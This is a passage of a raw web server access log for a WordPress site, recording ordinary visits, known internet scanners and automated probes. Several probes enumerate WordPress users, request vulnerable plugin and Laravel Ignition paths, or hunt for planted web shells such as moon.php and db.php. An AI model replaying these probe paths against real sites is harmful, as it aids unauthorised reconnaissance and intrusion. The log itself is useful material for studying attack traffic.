x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/112.0.5615.121 Safari/537.36" 176.67.82.4 - - [27/May/2023:10:44:42 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 202.74.239.91 - - [27/May/2023:10:44:42 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 185.242.7.134 - - [27/May/2023:10:44:42 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36" 185.206.225.174 - - [27/May/2023:10:44:42 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36" 185.242.7.134 - - [27/May/2023:10:45:15 +0700] "OPTIONS / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" 202.74.239.91 - - [27/May/2023:10:45:16 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1" 51.81.167.146 - - [27/May/2023:11:00:10 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Mobile/15E148 Safari/604.1" 191.101.31.43 - - [27/May/2023:11:16:28 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" 3.71.115.163 - - [27/May/2023:11:16:28 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0" 173.245.219.46 - - [27/May/2023:11:16:28 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 162.222.195.109 - - [27/May/2023:11:16:28 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36" 178.208.176.119 - - [27/May/2023:11:16:29 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/604.1" 191.101.31.43 - - [27/May/2023:11:16:33 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1" 173.245.219.46 - - [27/May/2023:11:16:33 +0700] "OPTIONS / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" 205.169.39.224 - - [27/May/2023:13:48:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 205.169.39.224 - - [27/May/2023:13:49:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 178.128.97.49 - - [29/May/2023:01:18:42 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 147.78.47.249 - - [29/May/2023:15:15:54 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [29/May/2023:15:15:57 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [29/May/2023:15:16:00 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [29/May/2023:15:16:03 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [29/May/2023:15:16:07 +0700] "GET /wp-content/plugins/elementor-pro/assets/css/editor.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 54.197.194.77 - - [31/May/2023:11:16:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/534.1" 139.59.10.149 - - [02/Jun/2023:05:24:12 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 139.59.10.149 - - [02/Jun/2023:05:24:14 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 139.59.10.149 - - [02/Jun/2023:05:24:16 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 3.253.132.244 - - [04/Jun/2023:21:29:55 +0700] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" 45.81.39.205 - - [05/Jun/2023:06:00:21 +0700] "GET /style.php?sig=update&domain=51.79.124.111 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 74.208.41.95 - - [06/Jun/2023:06:55:11 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 74.208.41.95 - - [06/Jun/2023:06:55:15 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 74.208.41.95 - - [06/Jun/2023:06:55:23 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 198.235.24.117 - - [06/Jun/2023:21:15:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 45.81.39.205 - - [09/Jun/2023:09:45:07 +0700] "GET /wp-content/plugins/revslider/includes/external/page/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [10/Jun/2023:04:28:34 +0700] "GET /wp-content/plugins/essential-addons-for-elementor-lite/readme.txt HTTP/1.1" 301 162 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" 45.81.39.205 - - [11/Jun/2023:07:28:31 +0700] "GET /.well-known/pki-validation/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [11/Jun/2023:23:59:19 +0700] "GET /dup-installer/main.installer.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.205 - - [11/Jun/2023:23:59:44 +0700] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 162.142.125.217 - - [12/Jun/2023:18:33:27 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 205.210.31.50 - - [13/Jun/2023:13:32:23 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 54.194.196.203 - - [14/Jun/2023:15:42:03 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3888.0 Safari/537.36" 185.84.108.7 - - [15/Jun/2023:07:40:04 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 147.78.47.249 - - [15/Jun/2023:10:30:16 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [15/Jun/2023:10:30:19 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [15/Jun/2023:10:30:22 +0700] "GET /wp-content/plugins/elementor-pro/assets/css/editor.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [15/Jun/2023:10:30:23 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [15/Jun/2023:10:30:27 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 132.148.76.242 - - [16/Jun/2023:11:14:17 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 132.148.76.242 - - [16/Jun/2023:11:14:21 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 132.148.76.242 - - [16/Jun/2023:11:14:29 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 143.198.104.138 - - [19/Jun/2023:16:15:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 189.113.169.150 - - [21/Jun/2023:15:40:51 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 189.113.169.150 - - [21/Jun/2023:15:40:57 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 189.113.169.150 - - [21/Jun/2023:15:41:01 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 87.236.176.197 - - [22/Jun/2023:10:13:00 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 167.248.133.34 - - [24/Jun/2023:13:46:22 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 35.213.203.149 - - [25/Jun/2023:20:20:50 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.213.203.149 - - [25/Jun/2023:20:20:58 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.213.203.149 - - [25/Jun/2023:20:21:01 +0700] "GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.213.203.149 - - [25/Jun/2023:20:21:01 +0700] "GET /checkout/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.213.203.149 - - [25/Jun/2023:20:21:01 +0700] "GET /shop/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 216.128.179.119 - - [26/Jun/2023:09:47:07 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 216.128.179.119 - - [26/Jun/2023:09:47:11 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 216.128.179.119 - - [26/Jun/2023:09:47:14 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 198.235.24.147 - - [27/Jun/2023:09:49:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 167.94.138.33 - - [27/Jun/2023:13:45:34 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 44.210.69.78 - - [27/Jun/2023:19:01:16 +0700] "GET //wp.lautnusantara.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2" 44.210.69.78 - - [27/Jun/2023:19:01:16 +0700] "GET //wp.lautnusantara.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 9; LM-V405) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" 114.132.41.45 - - [28/Jun/2023:06:53:10 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 147.78.47.249 - - [28/Jun/2023:16:32:21 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [28/Jun/2023:16:32:25 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [28/Jun/2023:16:32:28 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [28/Jun/2023:16:32:32 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [28/Jun/2023:16:32:35 +0700] "GET /wp-content/plugins/elementor-pro/assets/css/editor.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 198.235.24.242 - - [01/Jul/2023:02:02:03 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 198.235.24.201 - - [04/Jul/2023:08:07:28 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 183.136.225.46 - - [06/Jul/2023:01:48:21 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 45.81.39.105 - - [06/Jul/2023:14:18:46 +0700] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 147.78.47.249 - - [06/Jul/2023:16:02:33 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [06/Jul/2023:16:02:36 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [06/Jul/2023:16:02:40 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [06/Jul/2023:16:02:43 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [06/Jul/2023:16:02:46 +0700] "GET /wp-content/plugins/elementor-pro/assets/css/editor.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 198.235.24.183 - - [07/Jul/2023:05:37:38 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 205.210.31.128 - - [08/Jul/2023:16:32:02 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 45.81.39.105 - - [09/Jul/2023:05:34:10 +0700] "GET /.well-known/pki-validation/moon.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.105 - - [09/Jul/2023:05:35:45 +0700] "GET /admin.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.105 - - [09/Jul/2023:05:36:21 +0700] "GET /wp-admin/includes/admin.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.105 - - [09/Jul/2023:05:37:03 +0700] "GET /wp-admin/user/admin.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.105 - - [09/Jul/2023:05:37:40 +0700] "GET /.well-known/pki-validation/admin.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.105 - - [09/Jul/2023:05:38:13 +0700] "GET /wp-admin/includes/moon.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.105 - - [09/Jul/2023:05:38:43 +0700] "GET /wp-admin/maint/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.105 - - [09/Jul/2023:05:39:16 +0700] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.105 - - [09/Jul/2023:05:40:00 +0700] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.105 - - [09/Jul/2023:05:40:42 +0700] "GET /1index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.105 - - [09/Jul/2023:05:41:54 +0700] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.105 - - [09/Jul/2023:05:42:36 +0700] "GET /shell20211028/ HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.105 - - [09/Jul/2023:05:42:59 +0700] "GET /wp-admin/dropdown.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.81.39.105 - - [09/Jul/2023:05:43:19 +0700] "GET /.well-known/pki-validation/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 144.76.36.178 - - [10/Jul/2023:20:06:51 +0700] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 144.76.36.178 - - [10/Jul/2023:20:07:02 +0700] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 144.76.36.178 - - [10/Jul/2023:20:07:09 +0700] "GET /wp-content/plugins/seoplugins/db.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 167.248.133.35 - - [12/Jul/2023:09:02:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 147.78.47.249 - - [14/Jul/2023:22:42:36 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [14/Jul/2023:22:42:41 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [14/Jul/2023:22:42:45 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [14/Jul/2023:22:42:49 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [14/Jul/2023:22:42:53 +0700] "GET /wp-content/plugins/elementor-pro/assets/css/editor.css HTTP/1.1" 301 162 "-" 